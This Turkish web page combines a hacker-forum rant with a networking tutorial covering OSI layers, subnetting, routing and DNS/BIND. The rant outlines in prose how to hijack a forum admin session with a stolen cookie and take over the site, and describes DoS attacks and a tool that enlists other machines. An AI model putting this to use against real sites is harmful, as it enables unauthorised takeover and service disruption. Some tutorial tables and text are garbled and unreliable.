Kendi bilgisayarımdaki COOKİE dosyasını açarım, Forum adminin ID sini ve ENCRYPT edilmiş şifresini o databaseden alırım ve kendi COOKİE dosyama koyarım. Forumun sayfasına girince bir bakarım ki ADMİN olarak forumdayım Daha sonra admin şifresini değiştiririm. Sonrada sitenin tamamını hack ederim. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Baktım olmuyor, bu forumların File Managerları var, isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Ona girerim ve gerisini siz düşünün artık. Bu iş bu kadar kolay!
Mesela bir siteyi tabandan ack edip ROOT olacan. Bu işte kolay ama en önce arkayı bilecen. Nasıl mı? Mesela benim dostum The-King adminlik yapıyor. Biraz kafayı çalıştırırsa manyak bir hacker olur çıkar. Mesela ben onun gibi adminlik yapıyor olsaydım şu anda isteyenin eline sitesini vermiştim bile... Ama arkayı bilmediğim için önden o şekilde birşeyler yapamıyorum. Tabii bu site hack edemediğim anl***** gelmiyor. Bilene ve kafası çalışana/çalıştıarana herşey kolay walla!
Yaaa millet bir ton adam döküman yazmış Allah razı olsun. Beni döküman yazma sorununundan kurtarmışlar. Gidin hack arşivimizdeki dökümanları okuyun diyoruz hala gelip Web Hack nasıl yapılır diye soruyonuz be kardeşim. Yaw bu sorunun tam bir cevabı olsaydı siteler ve forumlar bölüm açmazdı bunun için. Böyle salak salak genel sorular sorupta sonra bana gelip ZORUNUZA MI GİTTİ diyen LAMER kaynayan ve hiçbirşeyden anlamayan forum ve sitelerden gelen bu tarz adamları öldüresim geliyor yaw!
Ya arkadaşım sen kimsin be yaw? Sen kimsinki insanlara saygısızlık yapıyorsun?
İnanmıyacaksınız ama ben bunuda söylüyorum çünkü manyak derecede sinirlendim, şu an türkiyenin en iyi hack sitesi sayılan ve bir ton üyesi olmasına rağmen, bilgi olarak bence sıfır olan bir sitenin açığını buldum! Beni bilen bilir ben asla sallamam. Bu açık ile neler yapıcağımı aklınız hayaliniz almaz! Ama ben birşeyler yapmıyorum hatta oradan bana laf bile gelse dokunmuyorum. Ben bilgisiz insanları aşağılayacak, onları üyelerine rezil edecek biri değilim. Ben dostluk yanındayım. Ama gün gelirde birileri benim düşmanım olursa o zaman ben bildiklerimi kötü işler için kullanırım ve taş taş üstünde kalmaz! Gördünüz Tymsah.com u hack etmek kolay idi. Ben size burda daha kötü olsaydı Database için gereken yolu da verirdim, nasıl okunacağını falanda. Ama yapmam! Tymsah arkadaşım, bana PM at ben sana bu sorundan kurtulma yolnunu anlatayım.
Gerçi ülke bu işlerden anlamayan LAMeRLAR ile kaynıyor ama olsun belki bilen biri sana verir. Nolur nolmaz.
Burdan beni, arkadaşlarımı ve sitemi çekemeyen Lamer arkadaşlara sesleniyorum, benim ve dostlarımın bilgisinden şüpheniz varsa bunu ortalık yerde konuşmayın gelin bize yüz yüze halledin. Biz birer atoma benziyoruz ve gün geldiğinde bir ülkeyi dahi yok edebilecek güce sahibiz. Ama gücümüz aklımızın esiri! Bu yüzden sıyırdınız gene...
Alınan ve kırılanlardan özür diliyorum, ama ne ekerseniz onu biçersiniz arkadaşlarım. Ben kimseye durduk yere çatmam. Diyeceğinizi diyin ve sonrada barışalım gitsin. Şundan emin olunki benden düşman değil bir dost istersiniz...
Soracaklarınızı uygun bir dille sormaya gayret ediniz aksi takdirde yanlış anlaşmalar olabiliyor.
Bide şu aralar birileri yada birisi benim açtığım tüm sitelere saldırıda bulunuyor. Bu saldırılara bis D.o.S diyoruz. Yani Denial Of Service. Bu tarz saldırılar için aşağıda açıklamayı tekrar yapacağım. Ama şunu belirtiyim bu saldırıları yapan her kim ise hem beni sevmiyor hemde namezero gibi dev bir siteyi zorlayacak kadar güçlü bir bağlantıya sahip (en az T1) ve %90 bu kişi türk değil. Diyecek bişey bulamıyorum ama bu kişinin ipsini ele geçirirsem ki geçiririm. Başı fena ağrır...
D.o.S:
D.O.S (Denial of Service) dediğimiz ataklar, T1 T3 dediğimiz yüksek bağlantılı makinalar yada basit Win tabanlı ve Dial-up tabanlı makinalar tarafından yapılan ping gönderme aşırı paket yollama ve BandWitdh dediğimiz sınırlamalı veri transferi (bizim site bu yüzden hergün 1 saat kapanır. 3GB veri transferimiz var.) dediğimiz olayın üstüne çıkarak Rate Limit Exceded gibi server hataları almamızı ISPden komamaızı ve bağlantımızın crash olmasını sağlayan NUKE de dediğimiz ataklardır. Bu atakları herkes programa ihtiyaç dumadanda yapabilir ama bu iyi bir bağlantı ve Win atağı değilse Unıx gibi sağlam bir sistem gerektirir. WinXP ve 2000 bu ataklar için önlem almış sistemlerdir ve internete hızlı bağlanırlar. Daha çok bilgi için Buaraya Bakın.
Beni sevmeyen birisi hem spymastersnake.com a hem ********* deki siteme hemde bu forumlara D.o.S saldırılarda bulunuyor.
Eğer No Space Left On Device diye bir hata görürseniz bu bize saldırıyor demektir.
Saldıran kişi Türk değil ama çok güçlü bir şekilde saldırıyor ki spymastersnake.com a host olan Namezero.com bile bundan etkileniyor. Tabiii buna hackerpower.com ve ********* de dahil. En az etkilenen ********* şu anda....
Şu aralar bizim sitenin counter’ının çalışmamasının nedenlerinden biride sitemizin counter hesabına sahip olduğu sitenin bu ataklara mağruz kalmasındandır. Hala bu ataklarla uğraşmaktalar. Ve serverda yenilikler yapmadan bir firewall sistemine geçmedende bence bu olayı düzeltemezler bence. Unutmayın bir Nuke yapmak için nuke yapacağınız sistemden iyi bir sisteme ve bağlantıya ihtiyacınız var. Ama AGRESSOR denilen bir program akıllıca kullandığı bir yöntem bunu başka maiknalara yaptırabiliyor. Ve bu program türk yapımı.
A { TEXT-DECORATION: none } A:hover { COLOR: red }
Temek Ağ (Network) Kavramları
Bu çalışmayı bana word dökümanı olarak gönderen İsmail Hakkı Şahin’e teşekkürler.
Ağ (network) kavramı, var olan kaynakların kullanıcılar tarafından beraber kullanılması, bilgiye ortak ulaşmaları ve buna bağlı olarak da maliyet ve zaman tasarrufu sağlanılması gereksiniminden ortaya çıkmıştır. Bu temel kuraldan hareketle oluşan ağlar günümüzde uzaktaki bilgiye erişim (Web), kişisel iletişim (E-mail, ICQ, IRC, Video-konferans), interaktif eğlence (Web-Tv, oyunlar) gibi kavramlarla hayatımızda önemli bir yer kaplamaktadır. Bir ağın oluşabilmesi için minimum iki makineye, bunlara takılı olarak ağ kartlarına ve de bağlantıyı sağlamak içinde kabloya ihtiyaç vardır.
Ağların Gelişimi ve Ağ Teknolojileri
Ana Makine (MainFrame) Modeli:
Ağ kavramı ilk olarak Ana Makine (MainFrame) teknolojisi ile ortaya çıkmıştır. Ana makinenin kendi işlemcisi (CPU), sabit diski (harddisk), ve bunları kumanda etmek için bir ekranı ve klavyesi ve de terminallere bağlı seri portları vardı. Bu aptal terminaller (dumb terminal) sadece ekran ve klavyeden oluşurdu, yani bir deyişle pasif makinelerdi. Terminallerin yerel bir disk alanları da olmadığı için bilgiyi ana makine üzerinde saklarlardı. Tüm yük ana makinenin üzerindeydi ve bu yüzden çok pahalıydı. En büyük dezavantajı tabii ki güvenilir olmaması, yani ana makinede çıkacak bir sorunun tüm sistemi etkilemesi, terminallerin kendi başlarına işlem yapabilme kaabiliyetlerinin olmaması idi. Bu önemli sorun halen çok popüler olan İstemci/Sunucu (Client/Server) modelinin doğmasına yol açtı.
İstemci / Sunucu (Client/ Server) Modeli:
İstemci/Sunucu modeli ile pasif terminaller yerine kendi başlarına işlemler yapabilen ve kendi sabit disklerinde programlar saklayabilen makineler geldi. Böylece her istemci kendi başlarına belirli işlemleri yerine getirebilmekte, yetersiz durumda kaldıklarında ise o işe özelleşmiş olan sunuculara başvurmakta idiler. Örneğin her istemcide ofis uygulamaları, masa üstü yayıncılık, oyun programları kullanılması buna rağmen veri tabanı ya da web gibi uygulamalarda bir sunucuya erişilmesi gibi.
Eşlenik Ağ (Peer to Peer) Modeli:
İstemci/Sunucu modelinin gelişmesi ve yaygınlaşması ile birlikte istemcilerin daha ön plana çıktığı, özelleşmiş sunuculara ihtiyaç duyulmayan ağ örnekleri de ortaya çıkmaya başladı. Bu ağlarda makineler yaklaşık özelliklerde idi ve işleyiş olarak birbirlerine üstünlük sağlamıyorlardı. Örnek; tamamen Windows 95/98 kullanan ağlar.
Ağ Teknolojilerinde Güç Sıralaması
İnternetin Doğuşu
İnternet tam anlamıyla ağlar arası ağdır. Bu kavramı açmak gerekirse büyük küçük binlerce ağın birleşmesinden oluşmuş en büyük ağdır. Bir kişiye, kuruluşa, ülkeye özel değildir.
İnternet kavramı aslında 1969’da savaş sonrasında düşünülen DARPA (Defense Advanced Research Project Agency - İleri Düzey Savunma Araştırmaları Kurumu) isimli basit bir projeden ibaretti. Bu proje büyük bilgisayarları birbirine bağlamayı ve ne olursa olsun bu bağı koparmamayı amaçlıyordu. Klasik bir ağ tarzında, bu ağdaki tek bir bağlantının kopması veya ana sunucunun imha edilmesi durumunda bu ağ çökecektir. Bu yüzden teknisyenler istemci-sunucu modeli yerine her bilgisayarın birbirine eşit özelliklerde olduğu türdeş ağ modeli tercih ettiler. İlk bağlantı California ve Utah’ta olan 4 bilgisayar arasında idi. Yavaş yavaş üniversitelerin de bağlanmasıyla ağ giderek büyümeye başladı. Bu proje daha sonra ARPANET (Advanced Research Projects Agency Network) adını aldı. Sivil kişi ve kuruluşların da bağlanmasıyla tüm Amerikayı kapsamaya başladı. ARPANET in beklenenden fazla büyümesiyle askeri kısmı MILNET adıyla ayrıldı ve daha sonra da ARPANET gelişerek bügünkü adıyla INTERNET !
adını aldı.
Ağ Çalışma Prensipleri
Temel olarak ağlarda iki tip çalışma prensibi vardır:
Yayın (Broadcast): Ağa atılan bir paketin her bilgisayara gönderilmesi.
Noktadan noktaya (Point to Point): Ağa atılan bir paketin özel bir noktaya iletilmesi.
Ağların çalışma prensipi genelde yayın tarzındadır. Buna rağmen İnternet omurgası noktadan noktaya çalışmaktadır.
Büyüklüklerine Göre AğlarLAN (Local Area Network) Yerel Alan Ağı: Kurulabilecek en küçük çaplı ağ olmakla birlikte büyüklükleri bir oda veya bir binayla sınırlı kalmayıp 1 km’ye kadar çıkabilmektedir. Örneğin küçük ve orta dereceli kurumların ağları.
WAN (Wide Area Network) Geniş Alan Ağı: Aralarında 1 km’den fazla mesafe olan LAN ların birleşmeleriyle meydana gelirler. Türkiye’deki en meşhur WAN’lardan biri Turnet (Türkiye iç omurgası, bir diğeri Ulaknet’tir (Üniversiteler arası ağ.
MAN (Metropolitan Area Network) Metropol Alan Ağı: WAN’ların şehir bazında ya da şehirler arası birleştirilmeleriyle oluşur, fakat günümüzde MAN kavramı kullanılmamakta, yerine WAN terimi tercih edilmektedir.
Mesafe Tablosu
10 m Oda
100 m Bina
1 km Fabrika / Kampüs
10 km Şehir
100 km Ülke
1000 km Bölge
1000 km Dünya
Ağ Topolojileri
Ağın fiziksel yapısı, kablolarla bağlantı şeklidir. Temel 3 topoloji vardır:
Kuyruk (Bus):
Doğrusal bir hat üzerinde kurulmuş bir yapıya sahiptir. Makineler kabloya T-konnektörler aracılığıyla bağlanırlar ve kablonun rezistansını düşürmemek için açıkta kalan iki ucuna sonlandırıcılar takılır. 10 mps hızda çalışır. Bir makinede veya kablonun herhangi bir noktasında oluşan arıza tüm sistemin çalışmasını engeller. Bu dezavantajına rağmen kurulumu en kolay yapı olduğu için tercih edilmektedir. Maksimum kapasitesi 10-12 makine olup, iki makine arası maksimum mesafe ince eş-eksenli (thin coaxial) kablo kullanıldığında 185 m, kalın eş-eksenli (thick coaxial) kablo kullanıldığında 500 metredir.
Zincir (Ring):
Kuyruk yapısındaki bir ağın sonlandırıcıların çıkarılarak iki ucunun birleştirilmesiyle oluşan ağ yapısıdır. En yaygın uygulaması IBM’e ait olan Token Ring topolojisidir. 4 mps veya 16 mps hızda çalışır. Kuyruk yapısının tüm özelliklerini taşımakla birlikte ağda bulunan düşük hızlı bir kart tüm sistemi yavaşlatır. Zincir yapısında ağda varolduğu düşünülen sanal bir jeton (token) tüm makineleri sırayla dolaşır ve bilgi alışverişi bu şekilde sağlanır.
Yıldız (Star)
Diğerlerinden farklı olarak, kablo,konnektör ve ağ kartına ek olarak hub,switch gibi diğer cihazlar kullanılarak oluşturulan ağ yapılarıdır. Genelde UTP (Unshielded Twisted Pair) korumasız çift dolanmış ya da STP (Shielded Twisted Pair) korumalı çift dolanmış kablo kullanılarak oluşturulur ve bilgisayarlarla bağlantı cihazının (hub gibi) maksimum mesafesi 100 metredir. Kullanılan çift dolanmış kablonun ve ağ kartının çeşitine göre farklı hızlarda çalışır. Her bilgisayarın bağlantısındaki problem yalnızca onun çalışmasını engellerken, ağdaki diğer cihazlar çalışmalarına devam ederler. Ancak bağlantı cihazlarındaki (hub, switch) problemler, o cihaza bağlanan tüm cihazların çalışmasını engeller. Diğerlerine göre daha güvenilir fakat pahalı çözümler sunar.
OSI Katmanları
Her teknojik üründe olduğu gibi ağlarda da standartları belirleyen bir kuruluş vardır. Bu kurum ISO (International Standards Organization) olarak bilinir ve ağ haberleşmesinde 7 katmandan oluşan OSI (Open System Interconnection) açık sistemler arası bağlantı kurallarını belirlemiştir. Bir ağ oluşturmak için fiziksel gereksinimlerin dışında, cihazların haberleşebilmeleri için ortak bir anlaşma biçimine yani bir takım protokollere ihtiyaç duyulur. Her protokolün çalıştığı katman yaptığı işe göre değişmektedir. Bu bahsedilen katmanlar şu şekilde sıralanmaktadır:
7 Uygulama / Application
6 Sunum / Presentation
5 Oturum / Session
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Uygulama katmanı kullanıcıya en yakın olan ve programla iletişimini sağlayan katman, fiziksel katman ise en uzak olan ve kablodaki veri transferini içeren katmandır. Bir veri demeti, programın uygulama katmanından fiziksel katmana kadar çeşitli işlemlerden geçip (enkapsüle edilip), kablo üzerinden ağa ve oradan da diğer bilgisayarlara ulaşıp tam tersi işleme tabi tutularak, uygulama katmanına çıkarak diğer kullanıcılara iletilir. İnternette ve ağ uygulamalarında yaygın olarak kullanılan TCP/IP protokolünün uygulanmasında ise 6 ve 5 numaralı katmanlar uygulama katmanının içine dahil edilir ve sonuç olarak ortaya melez (hybrid) bir yapı ortaya çıkar.
TCP / IP Modeli:
7 Uygulama / Application
------
------
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Melez (Hybrid) Model (OSI & TCP/IP)
5 Uygulama / Application
4 Taşıma / Transport
3 Ağ / Network
2 Veri iletim / Data Link
1 Fiziksel / Physical
Ortaya çıkan bu melez model bundan sonraki anlatımların temelini oluşturacak ve her katman detaylarıyla ayrı başlıklar altında incelenecektir. Bu modele göre katmanlarda çalışan bazı protokol örnekleri ise şöyledir:
5 HTTP,TELNET,SMTP, IRC
4 TCP
3 IP
2 PPP
1 BNC
5 CNC
4 SPX
3 IPX
2 Ethernet
1 UTP
Fiziksel Katman
Bu katman tamamiyle fiziksel bağlantıdan sorumlu olup, kablo, konnektor gibi parçalardan meydana gelmektedir.
Ağ yapılarında kullanılan kablo türleri:
Eş-eksenli (coaxial / BNC): Televizyon kablosunun daha esnek ve ince olanıdır. Bakır tellerden ve üzerinde manyetik korumadan ibarettir. İnce ve kalın olmak üzere iki çeşittir. İnce olanının taşıma mesafesi 185m. Kalın olanının ki ise 500 metredir. Bu nedenler kalın eş-eksenli kablolar genelde omurga yapılarında kullanılır.
Çift dolanmış (twisted pair / UTP-STP): 8 tane çifte dolanmış telden ibarettir. 10 Mbit hızda çalışırken bunların yanlızca 4 tanesi kullanılır. 100 Mbit çalışabilmesi için bu 8 telin belirli bir sıra takip eder durumda bağlanması gerekmektedir. Korumalı (STP) ve korumasız (UTP) olarak iki çeşittir. STP genelde fabrikalar gibi manyetik alanların ya da fiziksel darbenin çok olabileceği yerlerde tercih edilir ve daha pahalıdır. Hıza göre şöyle ayrılır:
CAT3 10 mps.
CAT4 4-16 mps.
CAT5 100 mps.
CAT6 1000 mps.
CAT7 1000 mps.
Bunlar dışında fiber kablo, kablolu TV, telefon hatları veya kiralık hatlar (leased line) fiziksel katmana dahildir.
Yükseltici (Repeater): Kablonun kapasitesinden daha fazla mesafelere bağlantı kurulması gerektiğinde araya bir yükseltici konularak sinyalin güçlendirilmesini sağlayan cihazdır.
Hub: Yıldız yapısındaki ağlarda merkezi bağlantıyı sağlayan cihazdır. Üzerindeki port sayısıyla isimlendirilir ve bu portlara makineler takılır. Hub aslında içerisinde tüm portları birbirine bağlayan kablolardan oluşmuş bir cihazdır ve kablolardan taşınan bilgiyi anlama kapasitesine sahip değildir. Yanlızca bir porttan gelen paketleri diğer bütün portlara yayın (broadcast) şeklinde iletir. Bu yüzden fiziksel katmana dahildir.
Modem: Bilgisayarın dijital sinyallerini analoga çevirerek kablo üzerinden iletilmesini sağlayan cihazdır. 19600, 28800, 57600 Kb hızlarında çeşitli tipleri vardır. Kiralık hatlarda kullanılan modemlere senkron modem, çevirmeli bağlantılarda (dial-up) ise asenkron modem kullanılmalıdır.
Veri İletimi Katmanı (Data / Link)
Bu katman framelerle uğraşır. Giden veri akışının düzgün olmasını sağlar. Hata düzeltme yapar. Bütün bu işlemlerden sorumlu olan eleman ağ kartıdır. Ağlarda bulunabilen frame tipleri ise şöyledir:
802.2 Ethernet II
802.3 Ethernet
802.4 Token Bus
802.5 Token Ring
Mac (Media Access Control) Adresi: Ağ kartı olan her makinenin bir de MAC adresi vardır. Bu adres o ağ kartı üzerine, üretildiği firma tarafından ROM üzerine kaydedilir ve bir daha değiştirilemez. MAC adresi ait olduğu kartın bağlı olduğu makineyi bulunduğu LAN içerisinde ayırt etmekte, daha doğrusu haberleşmede kullanılır. Her üretici firmaya ait olan MAC adresi havuzu farklı olduğundan teorik olarak aynı MAC adresi iki farklı kart üzerinde bulunamaz. Bu olasılık gerçekleşse bile aynı ağ ortamı içerisinde çalışmadıkları sürece ağda bir problemle karşılaşılmaz.
Switch: MAC adresleri mertebesinde çalışan bir cihazdır. Portlarına bağlanan makinelerin MAC adreslerini kendi tablosuna kaydeder ve switch içerisindeki data transferi noktadan noktaya gerçekleşir. Switchler hublara göre daha akıllı ve pahalı cihazlardır ve kendi üzerlerinde işlemcileri ve hafızaları vardır. Switch ler yanlızca makinelerin direk olarak bağlanması için değil ayni zamanda ağların yükünü azaltmak için kullanılırlar. Diyelim ki birbirine bağlı 4 adet 16 portluk hub var. Bu ağdaki yayın trafiği ve paket çarpışmaları bayağı yüksek olacaktır. Bu durumlarda ağa bir merkezi switch koyup buradan hubları besleme yöntemine gidilmelidir. Böylece her bir hubda oluşan trafik diğer hublara yayın olarak yansımayacak ve lokal kalacak, hublar arası iletişm gerektiğinde ise noktadan noktaya gerçekleşecektir. İyi bir switch yüksek bir hafızaya, portlara aktarım ve portlar arası iletim hızına sahip olmalıdır. Eğer port başına düşen hafıza veya dinamik olarak paylaşılan hafıza düş!
ük ise daha sonra gelen paketler o portun hafızasında tutulamıyacak ve tekrar yollanması istenecektir. Switchler bir ağı hızlandırır fakat ikiye bölmezler.
Ağ (Network)Katmanı
Ağ katmanının tek görevi adreslemeyi sağlamaktır. Adresleme bir anlamda ağdaki paketin yolunu bulabilmesidir. İnternette adresleme için kullanılan protokole IP, bu protokolun kullandığı adreslere ise IP adresleri denir. IP adresleri her biri 8 bit yer kaplayan ve 0-255 arsında olan 4 oktetten oluşurlar. IP adresleri birinci oktetlerine göre 5’e ayrılırlar:
A grubu 0.0.0.0 - 127.255.255.255
B grubu 128.0.0.0 - 191.255.255.255
C grubu 192.0.0.0 - 223.255.255.255
D grubu 224.0.0.0 - 239.255.255.255
E grubu 240.0.0.0 - 255.255.255.255
Tüm ağlarda yanlızca A,B ve C grupları kullanılır. D grubu multicast adı verilen IP leri grupla***** mesaj gönderen uygulamalarda (multimedya gibi) nadir olarak kullanılır. E grubu ise reserve edilmiştir ve kullanılmamaktadır.
IP adresleri Avrupada RIPE adı verilen bir kuruluş dağıtmaktadır. Herhangi bir IP yi kullanabilmek için RIPE e başvurup, onun size tahsis ettiği adresleri kullanmanız gerekmektedir. Aksi halde ciddi sorunlarla karşı karşıya kalmanız içten bile değildir. Fakat bu bahsedilen 5 grup içerisinde halkın kullanımına açılmış ve İnternet üzerinde kullanılmayan özel (private) IP adresleri vardır:
A grubu - 10.0.0.0
B grubu - 172.16.0.0
C grubu - 192.168.0.0
Yukarıda belirtilen özel IP lerin kullanımı herkese açıktır. Bunlar dışında bir de test amaçlı kullanılan ve her makinenin kendisini belirttiği kabul edilen bir başka IP adresi de 127.0.0.1 dir.
IP adresleri her zaman alt ağ maskesi (subnet mask) ile birlikte kullanılmaktadır. Subnet mask bir IP adresinin bağlı olduğu ağ adresini belirlemeye yarar. Standart subnet mask lar şu şekildedir.
A grubu - 255.0.0.0
B grubu - 255.255.0.0
C grubu - 255.255.255.0
Buna göre her gruptan birer IP adresi alıp, ilgili ağ adreslerini bulursak:
A grubu - 255.0.0.0 - 10.91.7.3 - 10.0.0.0
B grubu - 255.255.0.0 - 130.44.51.6 - 130.44.0.0
C grubu - 255.255.255.0 - 200.15.1.1 - 200.15.1.0
Yukarıdaki tablo bölünmemiş ağ adresleri, yani standart alt-ağ maskeleri ile geçerlidir. Bölünmemiş ağ adreslerinde bulunan IP adresleri sayıları ise şöyledir:
Grup Ağ Adresi Sayısı Adreslenebilir Makine Sayısı
A 126 (255*255*255)-2
B 63*255 (255*255)-2
C 31*255*255 255-2
Bir ağ adresindeki IP adreslerini ikinin üsleri şeklinde bölüp birden fazla ağ oluşturmak mümkündür. Buna alt-ağ oluşturmak (subnetting) denir. Bunu yapmak için bölümlenmiş alt-ağ maskeleri kullanmak lazımdır. Bu değerler aşağıdaki tablodaki gibidir:
Alt-Ağ Sayısı A Grubu Subnet Mask B Grubu Subnet Mask C Grubu Subnet Mask
2 255.128.0.0 255.255.128.0 255.255.255.128
4 255.192.0.0 255.255.192.0 255.255.255.192
8 255.224.0.0 255.255.224.0 255.255.255.224
255.240.0.0 255.255.240.0 255.255.255.240
32 255.248.0.0 255.255.248.0 255.255.255.248
64 255.252.0.0 255.255.252.0 255.255.255.252
Bu tablo ya göre 192.168.1.0 C grubu ağ adresini 4’e bölersek şu sonucu elde ederiz:
Ağ Numarası Ağ Adresi Yayın (Broadcast) Adresi Alt Ağ Maskesi
1 192.168.1.0 192.168.1.63 255.255.255.192
2 192.168.1.64 192.168.1.127 255.255.255.192
3 192.168.1.128 192.168.1.191 255.255.255.192
4 192.168.1.192 192.168.1.255 255.255.255.192
Router (Yönlendirici): Networkler arası haberleşmenin yapılabilmesi için ara bağlantıyı sağlayacak cihazlara router denir. Routerin bir işlemcisi, epromu ve üzerinde bir işletim sistemi IOS (Internal Operating System) vardır.
Routerlar IP paketlerinin yönlendirilmesinden sorumludur ve bu yüzden üzerlerinde routing tabloları tanımlanmıştır. Routing tabloları iki çeşittir: Statik ve dinamik.
Aşağıda şekli gözüken ağ için statik routing tabloları şöyledir:
Statik Routing - Router A
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.1.1.2
192.168.3.0 255.255.255.0 10.0.1.1 10.0.2.2
Statik Routing - Router B
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 10.0.1.2 10.0.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
Dinamik routing tablolarında ise tabloya yanlızca router’ın direk olarak bağlı olduğu ağ adresleri eklenerek, RIP protokolü ile tabloların routerlar arasında paylaşılması sağlanır.
Dinamik Routing - Router A - Başlangıç
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.0.1.2
Dinamik Routing - Router B - Başlangıç
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.2 192.168.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
Dinamik Routing - Router A - RIP sonrası
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 192.168.1.1 192.168.1.1
192.168.2.0 255.255.255.0 10.0.1.1 10.0.1.2
192.168.3.0 255.255.255.0 10.0.1.1 10.0.2.2
Dinamik Routing - Router B - RIP sonrası
Hedef Alt Ağ Maskesi Interface Gateway
192.168.1.0 255.255.255.0 10.0.1.2 10.0.1.1
192.168.2.0 255.255.255.0 192.168.2.1 192.168.2.1
192.168.3.0 255.255.255.0 10.0.2.1 10.0.2.2
DOMAIN NAME SYSTEM-
HostnameIP adresleri 32-bit olduğu için 212.29.89.3 gibi bir ip yerine, hostname mayasistem yazmak daha kolaydır.Hostnameler ip numarasına dönüştürülürler.-Domain adları ve subdomainlerHost yada domain adlarının tanımlanmasında kullanılır.Organizasyon ve coğrafi yapıya gore top level domain’ lere ayrılırlar. Ör: com, edu, org, gov, tr, de vb.Subdomain’ ler domain hiyerarşinini belirtir.Ör: vestelnet.net.trDomainsubdomain adları birer network numarasına dönüştürülebilirler Domain Name SistemiHostname’ in tam hali domain ve subdomain’ i içerir. Ör: , vestelnet.net.trBu adlandırma avantajı ilgili IP numarası değişikliklerinden izole edilir.DNS server’ lar (DNSS)Keyfi seçilmiş bir adres çözümlemesi için hostlar DNSS’ le hemen bağlantı kurar ve hiyerarşide yer alan diğer DNSS’ lerde doğru karşılığı bulunana kadar route işlemi gerçekleşir.Arada bulunan DNSS cache’ lerin yardımıyla kayıtlar daha kısa sürede bulunabilir.DNNS’ ler aralarında UDP ile haberleşirler, sebebi ise daha hız!
lı iletişim kurabilmektir.DNS Iletişim örneğialamut.cmpe.boun.edu.tr adresini çözmek için DNSS’ lere cmpe ya da boun domainleri için bağlantı kurar. Bu istek tr DNSS’ e, daha sonra US’ deki top level domain DNSS’ lere, oradan da de DNSS (kayıt orada olduğu için) route edilir ve oradan boun DNSS ve palamut.cmpe.boun.edu.tr’ a geri dönüş olur.DNS özellikleriSistem esas alınarak domain adına dayalı database hiyerarşik bir yapıya sahiptir.Milyonlarca host bilgisini organize eden domain clusterı çok iyi bir şekilde dengelemelidir.Yeni hostların bilgisi networkte hiyerarşik bir şekilde dağılır.Berkeley Internet Domain Name (BIND)Client konfigürasyonuServer Konfigürasyonunslookup programıNetwork Information Service (NIS) YazılımıClient KonfigürasyonuServer Konfigürasyonu BIND softwareDNS Unix sistemi üzerinde çalışır.Clientserver yazılımı mevcuttur.Resolver : ad sorgulaması yapan client’ tır, ilgili isme karşılık gelen ip no. nedir diye sorar.Named : ad sorgulama !
işlemlerine cevap veren server’ dır.BIND yazılımındaki olabile!
cek konfigürasyonlar özellikleriadece soru soranCevapları aklında tutanPrimary ( master ) Secondary ( slave ) : milyonlarca name dolaşıyor ama tek başına yeterli değil, primary’ ye soran .Resolver KonfigürasyonuResolver ayrı bir proses olmamakla beraber, network prosesi için gerekli bilgileri içeren bir kütüphane görevi görür. Gelen istekleri once kendisinde arar, bulamazsa diğer makina ile bağlantı kurar.resolve.conf komutu kullanılarak ya da default konfigürasyon kullanılarak kullanılabilir.Default Resolver KonfigürasyonuDefault name server olarak local host’ u kullanır.hostname komutu kullanılarak domain name kayıdı çıkarılır.Resolver konfigürasyon dosyası: /etc/reslv.confLocal system named yapılmamışsa kullanılır.Domain adı once serverdan çözümlenmeye çalışılır, eğer bulamazsa client’ a yönelir./etc/resolv.conf komutunda yapılabilecek kayıtlar:-nameserver adresdosyada bulunan serverlar ad sırasına göre kaydediliren çok bağlanılan domainler maksimum 3 server kullanılara!
k kayıtlar yenilenir.-domain adıresolv.conf dosyası:
domain cc.vestelnet.net.tr
#try yourself firstnameserver 127.0.0.1
#try ns1.vestelnet.net.tr nextnameserver 212.29.65.250
#finally try ns2.vestelnet.net.trnameserver 212.29.65.240
named konfigürasyonuGereken dosyalar:- named.boot (directory)- named.ca (cache)- named.local (numaraya karşılık gelen isim bulunuyor)- named.rev- named.hostsnamed.boot dosyası Komut FonksiyonuDirectory Sonradan yaratılan directory’ leri bulurPrimary Server’ ı primary olarak algılarSecondary Server’ ı secondary olarak algılar Cache Cache file’ nı gösterirForwarders Bulunamayan isimlerin forward edildiği serverları listelerSlave Forwardlar için kullanılan serverların slave olarak çalışmasını sağlarÖrnek: sadece cache işlemi yapan serverın konfigürasyonunda named.boot kullanımıPrimary 0.0.127.IN-ADDR.ARPA /etc/named.localCache. /etc/named.caÖrnek: primary server konfigürasyonunda named.boot komutunun kullanımı; vestelnet.net.tr primary server boot filedirectory /etcsecondary ns2.vestelnet.net.tr 212.29.65.240 primary ns1.vestelnetnet.tr 212.29.65.250 cache .BIND için standart kaynak kayıtlarıKaynak Kayıt, tekst adı Kayıt FonksiyonuStart of Authority SOA Zone girişini etkiyen pa!
rametreleri belirtirName Server NS Domain adı server’ın adını belirtirAddress A Host name’ I adrese çevirirPointer PTR Adresi hostname’ e çevirirMail Exchange MX Domain adına gönderilen mailin ulaşacağı yerdir CNAME alias hostname belirlerHost information HINFO OS ve host’ un hardware’ ini açıklarWell Known Service WKS Network servisini duyururDNS kaynak kayıtlarının formatı[name] [time-to-live (sec)] IN type dataEski kullanılmamış kayıtları unutup, yenilerine yer açmak için kullanılır.Örnek: named.ca dosyası; root domain için serverlar.
99999999 IN NS arabul.veezy.com.tr
99999999 IN NS bulmaca.gen.tr
99999999 IN NS veezygo.com.tr;
Root servers by addressarabul.veezy.com.tr
99999999 IN A 212.29.65.100bulmaca.gen.tr
99999999 IN A 212.29.65.101veezygo.com.tr
99999999 IN A 212 .29.65.102A:
